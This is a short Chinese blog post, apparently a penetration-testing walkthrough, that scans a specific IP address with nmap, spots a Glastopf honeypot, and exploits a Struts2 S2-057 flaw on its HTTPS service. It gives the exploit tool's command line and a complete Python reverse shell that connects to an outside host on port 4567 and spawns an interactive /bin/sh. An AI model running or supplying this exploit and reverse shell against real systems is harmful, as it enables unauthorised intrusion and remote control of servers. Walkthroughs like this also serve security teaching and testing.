美文网首页
渗透测试—从web到内网

渗透测试—从web到内网

作者: 小小怪吃吃吃 | 来源:发表于2020-11-11 15:37 被阅读0次

    1、nmap端口扫描
    nmap 124.16.75.162 -p1-10000
    发现443https、80http、222mysql、322ssh服务。

    2、http服务

    蜜罐web界面
    发现是一台Glastopf蜜罐,详见https://zhuanlan.zhihu.com/p/134705386

    3、https服务
    看到LoginAction,猜测是structs2漏洞,用工具探测一下,发现是s2-057漏洞。
    ```python S2-057-exp.py -u https://124.16.75.162/IndexAction.action -p S2-057-2 -c shell命令 --exp``

    s2-057

    4、上传shell

    import socket,subprocess,os
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(("123.206.92.61",4567))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    p=subprocess.call(["/bin/sh","-i"]);
    

    相关文章

      网友评论

          本文标题:渗透测试—从web到内网

          本文链接:https://www.haomeiwen.com/subject/yrptnhtx.html